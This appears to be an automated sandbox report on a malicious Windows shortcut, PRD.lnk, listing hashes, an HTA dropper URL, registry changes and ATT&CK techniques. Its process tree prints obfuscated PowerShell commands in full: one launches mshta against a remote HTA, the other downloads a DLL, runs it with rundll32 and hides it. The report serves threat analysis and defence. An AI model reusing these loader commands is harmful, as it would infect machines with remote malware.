a1fcac59a0ba12009a3bec84f8609311fb4044183ad6c6a211f897aa2c6b4726

General

Target

PRD.lnk
Size

1.9MB
MD5

6d3b37ea0e22cb04d9227dee552663f4
SHA1

2e1d39395fc36693d2abff8709db4261909e7cda
SHA256

9c4cfd85af061badf6bab38ace88be3a6a21e64fd99571eee8e93fed745261f9
SHA512

3089cecd1b4fb2c843aec61f1cb5a28f8c1052c5ff7296301a6702050b0916b847f199bf78134d88bca1797eabfa70721a9d26d425bc50053018954e290302c7

Score

10^/10

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://pidipurev.com/a1799.hta

Signatures

Blocklisted process makes network request 7 IoCs

flow	pid	Process
4	1324	mshta.exe
6	1324	mshta.exe
8	1324	mshta.exe
10	1324	mshta.exe
12	1324	mshta.exe
13	1492	powershell.exe
14	1492	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1780	powershell.exe
1492	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	1492	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 988 wrote to memory of 1780	988	cmd.exe	28
PID 988 wrote to memory of 1780	988	cmd.exe	28
PID 988 wrote to memory of 1780	988	cmd.exe	28
PID 1780 wrote to memory of 1324	1780	powershell.exe	29
PID 1780 wrote to memory of 1324	1780	powershell.exe	29
PID 1780 wrote to memory of 1324	1780	powershell.exe	29
PID 1324 wrote to memory of 1492	1324	mshta.exe	32
PID 1324 wrote to memory of 1492	1324	mshta.exe	32
PID 1324 wrote to memory of 1492	1324	mshta.exe	32
PID 1492 wrote to memory of 1448	1492	powershell.exe	34
PID 1492 wrote to memory of 1448	1492	powershell.exe	34
PID 1492 wrote to memory of 1448	1492	powershell.exe	34

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\PRD.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $uVOFxPZI = [convert]::FromBase64String('enZr');$SvjOMbNF = [convert]::FromBase64String('XkBbR1ITW0dHQ0AJHBxDWldaQ0ZBVkUdUFxeHFICBAoKHVtHUg==');$OFVQWJMp = -join($uVOFxPZI | % {[char] ($_ -bxor 0x33)});$ZwhCtgVk = -join ($SvjOMbNF | % { [char] ($_ -bxor 0x33)});sal idMJYXuL $OFVQWJMp;idMJYXuL $ZwhCtgVk
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" https://pidipurev.com/a1799.hta
    3⤵
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    PID:1324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function cWJskuQlbOmpMA($ukeBbVmYNH, $EFucjtI){[IO.File]::WriteAllBytes($ukeBbVmYNH, $EFucjtI)};function zyZFKJmgHX($ukeBbVmYNH){if($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68588,68596,68596))) -eq $True){Start-Process (tXhPzTmXMFNFufDI @(rundll32.exe $ukeBbVmYNH ,TSErsNqyhR ))}elseif($ukeBbVmYNH.EndsWith((tXhPzTmXMFNFufDI @(68534,68600,68603,68537))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ukeBbVmYNH}else{Start-Process $ukeBbVmYNH}};function kpcQqRGkdksJXcLvOm($cWJskuQlbOmpMA){$jXeMAsDGusrM=(tXhPzTmXMFNFufDI @(68560,68593,68588,68588,68589,68598));$PlebPQOXHehbVKBBhSo=(Get-ChildItem $cWJskuQlbOmpMA -Force);$PlebPQOXHehbVKBBhSo.Attributes=$PlebPQOXHehbVKBBhSo.Attributes -bor ([IO.FileAttributes]$jXeMAsDGusrM).value__};function CnfznBhFm($qmukbsVTysBgrFlHF){$XovuEuCBHyBHjrpc = New-Object (tXhPzTmXMFNFufDI @(68566,68589,68604,68534,68575,68589,68586,68555,68596,68593,68589,68598,68604));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$EFucjtI = $XovuEuCBHyBHjrpc.DownloadData($qmukbsVTysBgrFlHF);return $EFucjtI};function tXhPzTmXMFNFufDI($cIhrmkNsmwm){$CcKhtridtJs=68488;$mssiUtTLO=$Null;foreach($AMEOxEPSnbDIIHAZ in $cIhrmkNsmwm){$mssiUtTLO+=[char]($AMEOxEPSnbDIIHAZ-$CcKhtridtJs)};return $mssiUtTLO};function wRHQAOwSkVoz(){$DQTYahmqYv = $env:AppData + '\';;$bCCPiHWusHeO = $DQTYahmqYv + '';If(Test-Path -Path $bCCPiHWusHeO){Invoke-Item $bCCPiHWusHeO;}Else{ $eSzamRIZLBTJ = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535));cWJskuQlbOmpMA $bCCPiHWusHeO $eSzamRIZLBTJ;Invoke-Item $bCCPiHWusHeO;}$CRGBhJNKWPuzGc = $DQTYahmqYv + 'a17_cr99.dll'; if (Test-Path -Path $CRGBhJNKWPuzGc){zyZFKJmgHX $CRGBhJNKWPuzGc;}Else{ $FKoBPFKAjO = CnfznBhFm (tXhPzTmXMFNFufDI @(68592,68604,68604,68600,68603,68546,68535,68535,68600,68593,68588,68593,68600,68605,68602,68589,68606,68534,68587,68599,68597,68535,68585,68537,68543,68583,68587,68602,68545,68545,68534,68588,68596,68596));cWJskuQlbOmpMA $CRGBhJNKWPuzGc $FKoBPFKAjO;zyZFKJmgHX $CRGBhJNKWPuzGc;};kpcQqRGkdksJXcLvOm $CRGBhJNKWPuzGc;;;;;}wRHQAOwSkVoz;
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1492
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a17_cr99.dll TSErsNqyhR
        5⤵
        
        PID:1448

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/988-54-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp

Filesize
8KB

Download
memory/1492-102-0x000007FEF3CD0000-0x000007FEF46F3000-memory.dmp

Filesize
10.1MB

Download
memory/1492-103-0x000007FEF3170000-0x000007FEF3CCD000-memory.dmp

Filesize
11.4MB

Download
memory/1492-104-0x00000000023B0000-0x0000000002430000-memory.dmp

Filesize
512KB

Download
memory/1492-105-0x00000000023B0000-0x0000000002430000-memory.dmp

Filesize
512KB

Download
memory/1780-94-0x000007FEF27D0000-0x000007FEF332D000-memory.dmp

Filesize
11.4MB

Download
memory/1780-96-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/1780-95-0x00000000027F4000-0x00000000027F7000-memory.dmp

Filesize
12KB

Download
memory/1780-98-0x00000000027F4000-0x00000000027F7000-memory.dmp

Filesize
12KB

Download
memory/1780-99-0x00000000027FB000-0x000000000281A000-memory.dmp

Filesize
124KB

Download
memory/1780-93-0x000007FEF3330000-0x000007FEF3D53000-memory.dmp

Filesize
10.1MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads